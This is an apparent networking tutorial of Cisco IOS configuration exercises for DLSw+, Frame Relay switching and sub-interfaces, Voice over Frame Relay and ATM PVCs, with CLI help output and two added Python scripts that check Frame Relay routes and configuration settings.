fast-hpr-support               Enable fast-switched HPR transport
group-cache                    Border Peer Caching Options
history-log                    Configure DLSw Circuit-History Log Capability
icannotreach                   Configure a resource not locally reachable by this router
icanreach                      Configure resources locally reachable by this router
llc2                           Dlsw llc2 options
load-balance                   Configure load balancing
local-peer                     Configure local peer
mac-addr                       Configure a static MAC address - location or path
max-multiple-rifs              Configure maximum multiple rifs per interface
multicast                      Configure DLSw Multicast Capability
netbios-cache-length           Configure NetBIOS name length
netbios-keepalive-filter       Filter NetBIOS session alive packets
netbios-name                   Configure a static NetBios name - location or path
peer-log-changes               print logging message in router log ONLY for error events
peer-on-demand-defaults        Change peer-on-demand defaults
port-list                      Configure a port list
prom-peer-defaults             Change prom-peer-defaults
redundant-rings                Configure redundant ring-list
remote-peer                    Configure a remote peer
ring-list                      Configure a ring list
rsvp                           Configure reservations using RSVP
timer                          Configure DLSw timers
tos                            Change IP Type Of Service precedence bits
touch-timer                    Configure DLSw touch timers
transparent                    Configure transparent media options
udp-disable                    Disable DLSw UDP unicast feature

(config)# dlsw local-peer ?


biu-segment
XID3 max receivable i-field spoofing and BIU segmenting
border
Capable of operating as a border peer
cluster
Set cluster id for this router
cost
Set peer cost advertised to remote peers
group
Set the peer group number for this router
init-pacing-window Initial Pacing Window Size for this local peer
keepalive
Set the default remote peer keepalive interval
lf
Local peer largest frame size
max-pacing-window
Maximum Pacing Window Size for this local peer
passive
This router will not initiate remote peer connections
peer-id
local-peer IP address; required for TCP/FST and peer
groups
promiscuous
Accept connections from non-configured remote peers
v2-single-tcp
use dlsw v2 single tcp peer bringup for all remote peers
from this router
vrf
VRF in which dlsw local peer resides
<cr>
(config)# dlsw local-peer peer-id ?
A.B.C.D Local Peer IP address
(config)# dlsw local-peer peer-id 10.0.0.1 ?
biu-segment         XID3 max receivable i-field spoofing and BIU segmenting
border              Capable of operating as a border peer
cluster             Set cluster id for this router
cost                Set peer cost advertised to remote peers
group               Set the peer group number for this router
init-pacing-window  Initial Pacing Window Size for this local peer
keepalive           Set the default remote peer keepalive interval
lf                  Local peer largest frame size
max-pacing-window   Maximum Pacing Window Size for this local peer
passive             This router will not initiate remote peer connections
peer-id             local-peer IP address; required for TCP/FST and peer groups
promiscuous         Accept connections from non-configured remote peers
v2-single-tcp       use dlsw v2 single tcp peer bringup for all remote peers from this router
vrf                 VRF in which dlsw local peer resides
<cr>
(config)# dlsw local-peer peer-id 10.0.0.1

Leave promiscuous off: with it the router accepts DLSw+ peer connections (TCP port 2065) from any address, and DLSw peering carries no authentication of its own, so only the explicitly configured remote peers should be able to reach the local peer.

Router(config)# dlsw remote ?


<0-4095> Remote peer ring group list
Router(config)# dlsw remote 0 ?
frame-relay Use Frame Relay for remote peer transport
fst
Use fast sequence transport (FST) for remote peer transport
interface
Use a direct interface for remote peer transport
tcp
Use TCP for remote peer transport
Router(config)# dlsw remote 0 tcp ?
A.B.C.D Remote peer IP address
Router(config)# dlsw remote 0 tcp 11.0.0.0 ?
backup-peer
Configure as a backup to an existing remote peer

bytes-netbios-out   Configure netbios bytes output filtering for this peer
circuit-weight      Configure circuit-weight for this peer
cluster             Override cluster-id of remote peer
cost                Cost to Reach this Remote Peer
dest-mac            Exclusive destination mac-addr for remote peer
dmac-output-list    Filter output destination mac addresses
dynamic             Enable dynamic connection for this remote peer
host-netbios-out    Configure netbios host output filtering for this peer
keepalive           Set keepalive interval for this remote peer
lf                  Largest Frame Size for this Remote Peer
lsap-output-list    Filter output IEEE 802.5 encapsulated packets
passive             Local peer will not initiate this remote peer connection
priority            Enable prioritization features for this remote peer
rif-passthru        Use rif_passthru for this remote peer
rsvp                Configure reservations using RSVP
tcp-queue-max       Maximum output TCP queue size for this remote peer
timeout             Set retransmission timeout value for this remote peer
v2-single-tcp       use dlsw v2 single tcp peer bringup for this remote peer
<cr>
(config)# dlsw remote 0 tcp 11.0.0.1


(config)# dlsw bridge ?
<1-255> Assign a Bridge Group to be assigned to DLSw
(config)# dlsw bridge 1 ?
llc2
LLC2 Interface Subcommands
locaddr-priority Assign an input SNA LU Addr priority list to this bridge
group
sap-priority
Assign an input sap priority list to this bridge group
<cr>
(config)# dlsw bridge 1
(config)# dlsw udp-disable
(config)# int fa0
(config-if)# bridge-group ?
<1-255> Assign an interface to a Bridge Group.
(config-if)# bridge-g 1 ?
circuit-group
Associate serial interface with a circuit group
input-address-list
Filter packets by source address
input-lat-service-deny
Deny input LAT service advertisements matching a
group list
input-lat-service-permit
Permit input LAT service advertisements matching a
group list
input-lsap-list
Filter incoming IEEE 802.3 encapsulated packets
input-pattern-list
Filter input with a pattern list
input-type-list
Filter incoming Ethernet packets by type code
lat-compression
Enable LAT compression over serial or ATM
interfaces
output-address-list
Filter packets by destination address
output-lat-service-deny
Deny output LAT service advertisements matching a
group list
output-lat-service-permit Permit output LAT service advertisements matching
a group list
output-lsap-list
Filter outgoing IEEE 802.3 encapsulated packets
output-pattern-list
Filter output with a pattern list
output-type-list
Filter outgoing Ethernet packets by type code
path-cost
Set interface path cost
priority
Set interface priority
spanning-disabled
Disable spanning tree on a bridge group
(config-if)# bridge-group 1
(config-if)# exit
(config)# bridge 1 protocol ieee


Cisco Router Challenge 197


Outline
This challenge involves the configuration of a frame-relay switch.
Objectives
The objectives of this challenge are to:

Define frame-relay switching.


Define frame-relay parameters for S0 and S1.

Outline
> enable
# config t
(config)# frame-relay switching
(config)# int s0
(config-if)# no ip address
(config-if)# encapsulation frame-relay
(config-if)# clock-rate 56000
(config-if)# frame-relay intf-type dce
(config-if)# no shutdown
(config-if)# frame-relay route 100 interface s1 101
(config-if)# exit
(config)# int s1
(config-if)# no ip address
(config-if)# encapsulation frame-relay
(config-if)# clock-rate 56000
(config-if)# frame-relay intf-type dce
(config-if)# no shutdown
(config-if)# frame-relay route 101 interface s0 100

In this case the S0 interface switches frames arriving on DLCI 100 out of S1 on DLCI 101, and S1 switches frames arriving on DLCI 101 back out of S0 on DLCI 100; a switched PVC needs a route statement in each direction.
Example
> enable
# config t
(config)# frame-relay ?
address
Address Registration with neighbor
de-list
Build a classification list to be used in setting the DE bit
switching enable frame relay pvc switching
(config)# frame-relay switching
(config)# int s0
(config-if)# no ip address
(config-if)# encapsulation ?
atm-dxi
ATM-DXI encapsulation
frame-relay Frame Relay networks


hdlc
Serial HDLC synchronous
lapb
LAPB (X.25 Level 2)
ppp
Point-to-Point protocol
smds
Switched Megabit Data Service (SMDS)
x25
X.25
(config-if)# encapsulation frame-relay
(config-if)# clock-rate 56000
(config-if)# frame-relay ?
accounting
Special accounting instruction
address-reg
ELMI address registration
broadcast-queue
Define a broadcast queue and transmit rate
class
Define a map class on the interface
congestion-management Enable Frame Relay congestion management
de-group
Associate a DE group with a DLCI
fragment
Enable end-to-end fragmentation for all PVCs
fragmentation
Adaptive fragmentation
ifmib-counter64
Support IF-MIB's total packet/byte counts of Counter64
on FR if/subif when main interface's ifSpeed < 20 Mbps
interface-dlci
Define a DLCI on an interface/subinterface
interface-queue
configure PVC interface queueing
intf-type
Configure a FR DTE/DCE/NNI interface
inverse-arp
Enable/disable FR inverse ARP
ip
Frame Relay Internet Protocol config commands
lmi-n391dte
set full status polling counter
lmi-n392dce
LMI error threshold
lmi-n392dte
LMI error threshold
lmi-n393dce
set LMI monitored event count
lmi-n393dte
set LMI monitored event count
lmi-t392dce
set DCE polling verification timer
lmi-type
Use CISCO-ANSI-CCITT type LMI
local-dlci
Set source DLCI when LMI is not supported
map
Map a protocol address to a DLCI address
multicast-dlci
Set DLCI of a multicast group
policing
Enable Frame Relay policing
priority-dlci-group
Define a priority group of DLCIs
qos-autosense
enable QOS autosense
route
frame relay route for pvc switching
traffic-shaping
Enable Frame Relay Traffic Shaping
traps-maximum
set max traps FR generates at link up or when getting
LMI Full Status message
(config-if)# frame-relay intf-type dce
(config-if)# no shutdown
(config-if)# frame-relay route ?
<16-1007> input dlci to be switched
(config-if)# frame-relay route 100 ?
interface outgoing interface for pvc switching
(config-if)# frame-relay route 100 i ?
Serial Serial
(config-if)# frame-relay route 100 interface s1 ?
<16-1007> output dlci to use when switching
(config-if)# frame-relay route 100 interface s1 101
(config-if)# exit
(config)# exit

To show the configuration of the PVC:


# show frame-relay pvc
PVC Statistics for interface Serial0 (Frame Relay DCE)

              Active     Inactive      Deleted       Static
  Local          0            0            0            0
  Switched       0            1            0            0
  Unused         0            0            0            0

DLCI = 100, DLCI USAGE = SWITCHED, PVC STATUS = ACTIVE, INTERFACE = Serial0

  input pkts 0             output pkts 0            in bytes 0
  out bytes 0              dropped pkts 0           in FECN pkts 0
  in BECN pkts 0           out FECN pkts 0          out BECN pkts 0
  in DE pkts 0             out DE pkts 0
  out bcast pkts 0         out bcast bytes 0        Num Pkts Switched 0
  pvc create time 00:01:50, last time pvc status changed 00:01:50

PVC Statistics for interface Serial1 (Frame Relay DCE)

              Active     Inactive      Deleted       Static
  Local          0            0            0            0
  Switched       0            1            0            0
  Unused         0            0            0            0

DLCI = 101, DLCI USAGE = SWITCHED, PVC STATUS = ACTIVE, INTERFACE = Serial1

  input pkts 0             output pkts 0            in bytes 0
  out bytes 0              dropped pkts 0           in FECN pkts 0
  in BECN pkts 0           out FECN pkts 0          out BECN pkts 0
  in DE pkts 0             out DE pkts 0
  out bcast pkts 0         out bcast bytes 0        Num Pkts Switched 0
  pvc create time 00:01:11, last time pvc status changed 00:01:11

To show the mapping of the DLCIs:


# show frame-relay route
Input Intf      Input Dlci      Output Intf     Output Dlci     Status
Serial0         100             Serial1         101             active
Serial1         101             Serial0         100             active
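To check that a switched PVC is wired in both directions without reading the table by eye, here is an added Python example (not from the NetworkSims page or from Cisco) that parses the show frame-relay route output above and reports any entry whose reverse route is missing; it also generates the paired frame-relay route statements for a list of PVCs, which is the general form of the S0/S1 configuration the outline builds by hand. The sample output is a constructed copy of the page's table with one extra one-way entry (DLCI 200 to 201) added to exercise the check; the function names are this example's own.

```python
import re

# Constructed copy of the 'show frame-relay route' output shown above, with a
# third, deliberately one-way entry (DLCI 200 -> 201) added so that the
# symmetry check below has something to report.
SAMPLE_ROUTE_OUTPUT = """\
Input Intf      Input Dlci      Output Intf     Output Dlci     Status
Serial0         100             Serial1         101             active
Serial1         101             Serial0         100             active
Serial0         200             Serial1         201             inactive
"""

# One data row: interface, DLCI, interface, DLCI, status.
ROUTE_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s+(\S+)\s*$")


def parse_frame_relay_routes(text):
    """Return the table as (in_intf, in_dlci, out_intf, out_dlci, status)
    tuples, skipping the header and anything that is not a data row."""
    routes = []
    for line in text.splitlines():
        m = ROUTE_RE.match(line)
        if m:
            in_intf, in_dlci, out_intf, out_dlci, status = m.groups()
            routes.append((in_intf, int(in_dlci), out_intf, int(out_dlci), status))
    return routes


def find_one_way_routes(routes):
    """A switched PVC needs a route in each direction: every
    (A, x) -> (B, y) entry must be matched by a (B, y) -> (A, x) entry.
    Return the entries whose reverse is missing."""
    forward = {(r[0], r[1]): (r[2], r[3]) for r in routes}
    return [r for r in routes if forward.get((r[2], r[3])) != (r[0], r[1])]


def frame_relay_switch_config(pvcs):
    """Emit the configuration for a router acting as a Frame Relay switch:
    one 'frame-relay route' per direction for each (intf, dlci, intf, dlci)
    PVC, the way the outline above pairs DLCI 100 and 101 by hand. DLCIs
    must fall in the 16..1007 range the CLI help above reports. The DCE
    clock-rate is left out because it depends on which end has the DCE
    cable."""
    per_intf = {}
    for a_intf, a_dlci, b_intf, b_dlci in pvcs:
        for dlci in (a_dlci, b_dlci):
            if not 16 <= dlci <= 1007:
                raise ValueError(f"DLCI {dlci} outside 16..1007")
        per_intf.setdefault(a_intf, []).append(
            f" frame-relay route {a_dlci} interface {b_intf} {b_dlci}")
        per_intf.setdefault(b_intf, []).append(
            f" frame-relay route {b_dlci} interface {a_intf} {a_dlci}")
    lines = ["frame-relay switching"]
    for intf, routes in per_intf.items():
        lines += [f"interface {intf}", " no ip address",
                  " encapsulation frame-relay", " frame-relay intf-type dce",
                  " no shutdown"] + routes
    return lines


if __name__ == "__main__":
    routes = parse_frame_relay_routes(SAMPLE_ROUTE_OUTPUT)
    for r in find_one_way_routes(routes):
        print("no reverse route for", r)
    print("\n".join(frame_relay_switch_config([("Serial0", 100, "Serial1", 101)])))
```

On the sample, only the DLCI 200 entry is reported; the 100/101 pair from the page passes. The generator refuses a DLCI outside the valid range so a typo cannot silently produce a route the router would reject.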

Cisco Router Challenge 198


Outline
This challenge involves the configuration of a sub-interface on a frame-relay connection for
a point-to-point link.
Objectives
The objectives of this challenge are to:

Define frame-relay switching for point-to-point connections.


Define frame-relay parameters for S0 and S1 for sub-interface.

Outline


> enable
# config t
(config)# int s0
(config-if)# no ip address
(config-if)# encapsulation frame-relay
(config-if)# no shutdown
(config-if)# no frame-relay inverse-arp
(config-if)# exit
(config)# int s0.100 point-to-point
(config-subif)# ip address 10.0.0.1 255.255.255.0
(config-subif)# frame-relay interface-dlci 101

Example
> enable
# config t
(config)# int s0
(config-if)# no ip address
(config-if)# encapsulation frame-relay
(config-if)# no frame-relay ?
broadcast-queue
Define a broadcast queue and transmit rate
class
Define a map class on the interface
de-group
Associate a DE group with a DLCI
interface-dlci
Define a DLCI on an interface/subinterface
intf-type
Configure a FR DTE/DCE/NNI interface
inverse-arp
Enable/disable inverse ARP on a DLCI
ip
Frame Relay Internet Protocol config commands
lmi-n391dte
set full status polling counter
lmi-n392dce
LMI error threshold
lmi-n392dte
LMI error threshold
lmi-n393dce
set LMI monitored event count
lmi-n393dte
set LMI monitored event count
lmi-t392dce
set DCE polling verification timer
lmi-type
Use CISCO-ANSI-CCITT type LMI
local-dlci
Set source DLCI when LMI is not supported
map
Map a protocol address to a DLCI address
multicast-dlci
Set DLCI of a multicast group
priority-dlci-group Define a priority group of DLCIs
qos-autosense
enable QOS autosense
route
frame relay route for pvc switching
traffic-shaping
Enable Frame Relay Traffic Shaping
traps-maximum
set max traps FR generates at link up or when getting
LMI Full Status message
(config-if)# no frame-relay inverse-arp ?
<cr>
bridge
Bridging
interval Set inarp time interval on an interface
ip
IP
qllc
qllc protocol
(config-if)# no frame-relay inverse-arp
(config-if)# no shutdown
(config-if)# exit
(config)# int s0.100 ?
multipoint
Treat as a multipoint link
point-to-point Treat as a point-to-point link
(config)# int s0.100 point-to-point
(config-subif)# ?
Interface configuration commands:
apollo
Apollo interface subcommands


appletalk
Appletalk interface subcommands
arp
Set arp type (arpa, probe, snap) or timeout
backup
Modify backup parameters
bandwidth
Set bandwidth informational parameter
bridge-group
Transparent bridging interface parameters
cdp
CDP interface subcommands
clns
CLNS interface subcommands
crypto
Encryption/Decryption commands
decnet
Interface DECnet config commands
default
Set a command to its defaults
delay
Specify interface throughput delay
description
Interface specific description
dlsw
DLSw Interface Subcommands
dspu
Down Stream PU
dxi
ATM-DXI configuration commands
exit
Exit from interface configuration mode
frame-relay
Set frame relay parameters
fras
DLC Switch Interface Command
ip
Interface Internet Protocol config commands
ipv6
IPv6 interface subcommands
ipx
Novell/IPX interface subcommands
isis
IS-IS commands
iso-igrp
ISO-IGRP interface subcommands
lat
LAT commands
llc2
LLC2 Interface Subcommands
map-group
Configure static map group
mls
mls sub/interface commands
mpls
Configure MPLS interface parameters
mtu
Set the interface Maximum Transmission Unit (MTU)
netbios
Use a defined NETBIOS access list or enable name-caching
no
Negate a command or set its defaults
ntp
Configure NTP
pulse-time
Force DTR low during resets
rate-limit
Rate Limit
service-policy Configure QoS Service Policy
shutdown
Shutdown the selected interface
smds
Modify SMDS parameters
smrp
Simple Multicast Routing Protocol interface subcommands
sna
SNA pu configuration
snapshot
Configure snapshot support on the interface
tag-switching
Tag Switching interface configuration commands
tarp
TARP interface subcommands
timeout
Define timeout values for this interface
traffic-shape
Enable Traffic Shaping on an Interface or Sub-Interface
vines
VINES interface subcommands
xns
XNS interface subcommands
(config-subif)# ip address 10.0.0.1 255.255.255.0
(config-subif)# frame-relay ?
class
Define a map class on the interface
de-group
Associate a DE group with a DLCI
interface-dlci
Define a DLCI on an interface/subinterface
inverse-arp
Enable/disable inverse ARP on a DLCI
ip
Frame Relay Internet Protocol config commands
map
Map a protocol address to a DLCI address
payload-compression Use payload compression
priority-dlci-group Define a priority group of DLCIs
(config-subif)# frame-relay interface-dlci ?
<16-1007> Define a switched or locally terminated DLCI
(config-subif)# frame-relay interface-dlci 101


This assigns DLCI 101 to the point-to-point sub-interface; because a point-to-point sub-interface carries exactly one DLCI, no frame-relay map statement is needed.

Cisco Router Challenge 198


Outline
This challenge involves the configuration of Voice over Frame-relay (VoFR).
Objectives
The objectives of this challenge are to:

Define frame-relay switching for point-to-point connections.


Define frame-relay parameters for S0 and S1 for sub-interface.
Define a map-class.
Define Cisco encapsulation for VoFR.

Outline
> enable
# config t
(config)# int s0
(config-if)# no ip address
(config-if)# encapsulation frame-relay
(config-if)# no shutdown
(config-if)# no frame-relay inverse-arp
(config-if)# exit
(config)# int s0.100 point-to-point
(config-subif)# ip address 10.0.0.1 255.255.255.0
(config-subif)# frame-relay interface-dlci 101
(config-fr-dlci)# class voipmap
(config-fr-dlci)# vofr cisco
(config-fr-dlci)# exit
(config-if)# exit
(config)# map-class frame-relay voipmap
(config-map-class)# frame-relay fair-queue
(config-map-class)# frame-relay voice bandwidth 64000
(config-map-class)# frame-relay fragment

Example
> enable
# config t
(config)# int s0
(config-if)# no ip address
(config-if)# encapsulation frame-relay
(config-if)# no shutdown
(config-if)# no frame-relay inverse-arp
(config-if)# exit
(config)# int s0.100 point-to-point
(config-subif)# ip address 10.0.0.1 255.255.255.0
(config-subif)# frame-relay interface-dlci 101
(config-fr-dlci)# ?


Frame Relay dlci configuration commands:


auto
Configure Automation
class
Assign a mapclass to a dlci
default
Set a command to its defaults
exit
Exit from FR dlci configuration mode
load-interval Specify interval for load calculation for a dlci
no
Negate a command or set its defaults
vofr
Voice over Frame-Relay
x25-profile
Assign an X.25 profile to a dlci (Annex G Service)
<cr>
(config-fr-dlci)# class ?
WORD map class name
(config-fr-dlci)# class voipmap
(config-fr-dlci)# vofr ?
call-control call-control sub-channel
cisco
Cisco encapsulation
data
data sub-channel
<cr>
(config-fr-dlci)# vofr cisco ?
<4-255> cid for vofr call-control
<cr>
(config-fr-dlci)# vofr cisco
(config)# map-class ?
atm
Asynchronous transfer mode
dialer
Dial on Demand
frame-relay Frame Relay
(config)# map-class frame-relay ?
WORD

Static map class name

(config)# map-class frame-relay voipmap


(config-map-class)# ?
Static maps class configuration commands:
default
Set a command to its defaults
exit-class
Exit from static map class configuration mode
frame-relay
Configure Map parameters
help
Description of the interactive help system
no
Negate a command or set its defaults
service-policy class-based service policy
(config-map-class)# frame-relay ?
adaptive-shaping
Adaptive traffic rate adjustment, Default = none
bc
Committed burst size (Bc), Default = 7000 bits
be
Excess burst size (Be), Default = 0 bits
cir
Committed Information Rate (CIR), Default = 56000 bps
congestion
Congestion management parameters
custom-queue-list VC custom queueing
end-to-end
Configure frame-relay end-to-end VC parameters
fair-queue
VC fair queueing
fecn-adapt
Enable Traffic Shaping reflection of FECN as BECN
fragment
fragmentation - Requires Frame Relay traffic-shaping to be
configured at the interface level
holdq
Hold queue size for VC
idle-timer
Idle timeout for a SVC, Default = 120 sec
interface-queue
PVC interface queue parameters
ip
Assign a priority queue for RTP streams
mincir
Minimum acceptable CIR, Default = CIR/2 bps
priority-group
VC priority queueing
tc
Policing Measurement Interval (Tc)
traffic-rate
VC traffic rate
voice
voice options


(config-map-class)# frame-relay fair-queue
(config-map-class)# frame-relay voice bandwidth 64000
(config-map-class)# frame-relay fragment

As the help text above notes, fragmentation only takes effect when frame-relay traffic-shaping is enabled on the physical interface (Serial0 here), and the fragment command expects a fragment size in bytes. Without both, voice frames are not fragmented and can be delayed behind large data frames on the same PVC.

Cisco Router Challenge 199


Outline
This challenge involves the configuration of a sub-interface on a frame-relay connection for
a multipoint link (that is, one sub-interface that reaches more than one remote site, each over its own DLCI).
Objectives
The objectives of this challenge are to:

Define frame-relay switching for multipoint connections.


Define frame-relay parameters for S0 and S1 for sub-interface.

Outline
> enable
# config t
(config)# int s0
(config-if)# no ip address
(config-if)# encapsulation frame-relay
(config-if)# no frame-relay inverse-arp
(config-if)# no shutdown
(config-if)# exit
(config)# int s0.100 multipoint
(config-subif)# ip address 10.0.0.1 255.255.255.0
(config-subif)# frame-relay map ip 10.1.1.1 100 broadcast
(config-subif)# frame-relay map ip 10.2.2.1 101 broadcast
(config-subif)# no ip split-horizon

Example
> enable
# config t
(config)# int s0
(config-if)# no ip address
(config-if)# encapsulation frame-relay
(config-if)# no shutdown
(config-if)# exit
(config)# int s0.100 ?
multipoint
Treat as a multipoint link
point-to-point Treat as a point-to-point link
(config)# int s0.100 multipoint
(config-subif)# ip address 10.0.0.1 255.255.255.0
(config-subif)# frame-relay ?
class
Define a map class on the interface


de-group
Associate a DE group with a DLCI
interface-dlci
Define a DLCI on an interface/subinterface
inverse-arp
Enable/disable inverse ARP on a DLCI
ip
Frame Relay Internet Protocol config commands
map
Map a protocol address to a DLCI address
payload-compression Use payload compression
priority-dlci-group Define a priority group of DLCIs
(config-subif)# frame-relay map ?
apollo
Apollo Domain
appletalk AppleTalk
bridge
Bridging
bstun
Block Serial Tunnel
clns
ISO CLNS
decnet
DECnet
dlsw
Data Link Switching
ip
IP
ipv6
IPV6
ipx
Novell IPX
llc2
llc2
pppoe
PPP over Ethernet
qllc
qllc protocol
rsrb
Remote Source-Route Bridging
stun
Serial Tunnel
vines
Banyan VINES
xns
Xerox Network Services
(config-subif)# frame-relay map ip ?
A.B.C.D Protocol specific address
(config-subif)# frame-relay map ip 10.1.1.1 ?
<16-1007> DLCI
(config-subif)# frame-relay map ip 10.1.1.1 ANY ?
broadcast
Broadcasts should be forwarded to this address
cisco
Use CISCO Encapsulation
compress
Enable TCP/IP and RTP/IP header compression
ietf
Use RFC1490/RFC2427 Encapsulation
nocompress
Do not compress TCP/IP headers
payload-compression Use payload compression
rtp
RTP header compression parameters
tcp
TCP header compression parameters
<cr>
(config-subif)# frame-relay map ip 10.1.1.1 100 broadcast
(config-subif)# frame-relay map ip 10.2.2.1 101 broadcast
(config-subif)# no ?
apollo
Apollo interface subcommands
appletalk
Appletalk interface subcommands
arp
Set arp type (arpa, probe, snap) or timeout
backup
Modify backup parameters
bandwidth
Set bandwidth informational parameter
bridge-group
Transparent bridging interface parameters
cdp
CDP interface subcommands
clns
CLNS interface subcommands
crypto
Encryption/Decryption commands
decnet
Interface DECnet config commands
delay
Specify interface throughput delay
description
Interface specific description
dlsw
DLSw Interface Subcommands
dspu
Down Stream PU
dxi
ATM-DXI configuration commands
frame-relay
Set frame relay parameters
fras
DLC Switch Interface Command
ip
Interface Internet Protocol config commands

ipv6
IPv6 interface subcommands
ipx
Novell/IPX interface subcommands
isis
IS-IS commands
iso-igrp
ISO-IGRP interface subcommands
lat
LAT commands
llc2
LLC2 Interface Subcommands
map-group
Configure static map group
mls
mls sub/interface commands
mpls
Configure MPLS interface parameters
mtu
Set the interface Maximum Transmission Unit (MTU)
netbios
Use a defined NETBIOS access list or enable name-caching
ntp
Configure NTP
pulse-time
Force DTR low during resets
rate-limit
Rate Limit
service-policy
Configure QoS Service Policy
shutdown
Shutdown the selected interface
smds
Modify SMDS parameters
smrp
Simple Multicast Routing Protocol interface subcommands
sna
SNA pu configuration
snapshot
Configure snapshot support on the interface
tag-switching
Tag Switching interface configuration commands
tarp
TARP interface subcommands
timeout
Define timeout values for this interface
traffic-shape
Enable Traffic Shaping on an Interface or Sub-Interface
vines
VINES interface subcommands
xns
XNS interface subcommands

(config-subif)# no ip ?
Interface IP configuration subcommands:
access-group
Specify access control for packets
accounting
Enable IP accounting on this interface
address
Set the IP address of an interface
authentication
authentication subcommands
bandwidth-percent
Set EIGRP bandwidth limit
bgp
BGP interface commands
broadcast-address
Set the broadcast address of an interface
cef
Cisco Express Fowarding interface commands
cgmp
Enable/disable CGMP
directed-broadcast Enable forwarding of directed broadcasts
dvmrp
DVMRP interface commands
hello-interval
Configures IP-EIGRP hello interval
helper-address
Specify a destination address for UDP broadcasts
hold-time
Configures IP-EIGRP hold time
igmp
IGMP interface commands
irdp
ICMP Router Discovery Protocol
load-sharing
Style of load sharing
mask-reply
Enable sending ICMP Mask Reply messages
mobile
Mobile IP support
mrm
Configure IP Multicast Routing Monitor tester
mroute-cache
Enable switching cache for incoming multicast packets
mtu
Set IP Maximum Transmission Unit
multicast
IP multicast interface commands
nat
NAT interface commands
nhrp
NHRP interface subcommands
ospf
OSPF interface commands
pgm
PGM Reliable Transport Protocol
pim
PIM interface commands
policy
Enable policy routing
probe
Enable HP Probe support
proxy-arp
Enable proxy ARP
rarp-server
Enable RARP server for static arp entries
redirects
Enable sending ICMP Redirect messages
rgmp
Enable/disable RGMP

rip
Router Information Protocol
route-cache
Enable fast-switching cache for outgoing packets
router
IP router interface commands
rsvp
RSVP interface commands
sap
Session Announcement Protocol interface commands
security
DDN IP Security Option
split-horizon
Perform split horizon
summary-address
Perform address summarization
unnumbered
Enable IP processing without an explicit address
unreachables
Enable sending ICMP Unreachable messages
urd
Configure URL Rendezvousing
verify
Enable per packet validation
vrf
VPN Routing/Forwarding parameters on the interface
wccp
WCCP interface commands

(config-subif)# no ip split-horizon ?
eigrp Enhanced Interior Gateway Routing Protocol (EIGRP)
<cr>
(config-subif)# no ip split-horizon

Because Inverse ARP is disabled here, frame-relay map statements are required to tie each remote IP address to its DLCI. Disabling Inverse ARP is good practice: the router then forwards only over the mappings you configured, rather than whatever address-to-DLCI pairs the far end happens to announce, so a misconfigured or hostile neighbour cannot change where your traffic goes. The no ip split-horizon at the end matters on a multipoint sub-interface: without it, routes learned from one DLCI are not re-advertised to the other DLCIs on the same interface.
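The two conditions just described are easy to miss when the physical and sub-interface stanzas are configured separately. As an added example (not NetworkSims code), the following audits an IOS Frame Relay configuration for static maps that coexist with Inverse ARP, and for multipoint sub-interfaces with several DLCIs that still have split horizon enabled. The configuration text is constructed from the commands on this page, with Serial1.200 added as a deliberately misconfigured second sub-interface.

```python
"""Audit an IOS Frame Relay configuration for the two settings Challenge 199
depends on: Inverse ARP disabled wherever static frame-relay map entries are
used, and split horizon disabled on multipoint sub-interfaces carrying more
than one DLCI. Added example, not NetworkSims code; SAMPLE_CONFIG is
constructed from the commands on this page plus a faulty Serial1.200."""
from __future__ import annotations
import re

SAMPLE_CONFIG = """\
interface Serial0
 no ip address
 encapsulation frame-relay
 no frame-relay inverse-arp
!
interface Serial0.100 multipoint
 ip address 10.0.0.1 255.255.255.0
 no ip split-horizon
 frame-relay map ip 10.1.1.1 100 broadcast
 frame-relay map ip 10.2.2.1 101 broadcast
!
interface Serial1
 no ip address
 encapsulation frame-relay
!
interface Serial1.200 multipoint
 ip address 10.9.0.1 255.255.255.0
 frame-relay map ip 10.9.1.1 300 broadcast
 frame-relay map ip 10.9.2.1 301 broadcast
!
"""

IFACE_RE = re.compile(r"^interface (\S+)(?: (multipoint|point-to-point))?\s*$")


def parse_interfaces(config: str) -> dict[str, dict]:
    """Return {name: {"type": ..., "lines": [...]}} for each interface stanza."""
    ifaces: dict[str, dict] = {}
    current = None
    for line in config.splitlines():
        m = IFACE_RE.match(line)
        if m:
            current = m.group(1)
            ifaces[current] = {"type": m.group(2) or "physical", "lines": []}
        elif line.startswith(" ") and current is not None:
            ifaces[current]["lines"].append(line.strip())
        else:
            current = None  # '!' or any other top-level line ends the stanza
    return ifaces


def has(lines: list[str], prefix: str) -> bool:
    return any(l.startswith(prefix) for l in lines)


def audit_frame_relay(config: str) -> list[str]:
    ifaces = parse_interfaces(config)
    findings = []
    for name, info in ifaces.items():
        maps = [l for l in info["lines"] if l.startswith("frame-relay map ")]
        if not maps:
            continue
        # Inverse ARP is on by default and is normally disabled on the physical
        # interface; disabling it on the sub-interface itself is also accepted.
        parent = ifaces.get(name.split(".")[0], {"lines": []})
        if not (has(parent["lines"], "no frame-relay inverse-arp")
                or has(info["lines"], "no frame-relay inverse-arp")):
            findings.append(f"{name}: static maps present but Inverse ARP still enabled")
        # Several DLCIs on one multipoint sub-interface: split horizon would stop
        # routes learned over one DLCI being advertised to the others.
        if (info["type"] == "multipoint" and len(maps) > 1
                and not has(info["lines"], "no ip split-horizon")):
            findings.append(f"{name}: multipoint with {len(maps)} DLCIs but split horizon still enabled")
    return findings


if __name__ == "__main__":
    for finding in audit_frame_relay(SAMPLE_CONFIG):
        print(finding)
```

Feed it the output of show running-config; Serial0.100 passes because its parent Serial0 has Inverse ARP off and the sub-interface has split horizon off, while Serial1.200 is flagged on both counts.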

Cisco Router Challenge 200


Outline
This challenge involves configuring a PVC on an ATM sub-interface. This is
the current method of defining a PVC; the older atm pvc interface command, still visible in the help output below, is the legacy syntax.
Objectives
The objectives of this challenge are to:

Define ATM details.


Create an ATM subinterface.
Define PVC details within subinterface.

Outline
> enable
# config t
(config)# int atm0
(config-if)# no ip address
(config-if)# no atm ilmi-keepalive
(config-if)# exit
(config)# int atm0.101 point-to-point
(config-subif)# ip address 10.1.1.1 255.255.255.0
(config-subif)# pvc 0/99
(config-if-atm-vc)# protocol ip 10.1.1.2 broadcast
(config-if-atm-vc)# encapsulation aal5snap


Example
(config)# int atm0
(config-if)# ?
Interface configuration commands:
access-expression
Build a bridge boolean access expression
apollo
Apollo interface subcommands
appletalk
Appletalk interface subcommands
arp
Set arp type (arpa, probe, snap) or timeout
atm
Modify ATM parameters
backup
Modify backup parameters
bandwidth
Set bandwidth informational parameter
bridge-group
Transparent bridging interface parameters
carrier-delay
Specify delay for interface transitions
cdp
CDP interface subcommands
class-int
Configure default vc-class name
clns
CLNS interface subcommands
crypto
Encryption/Decryption commands
custom-queue-list
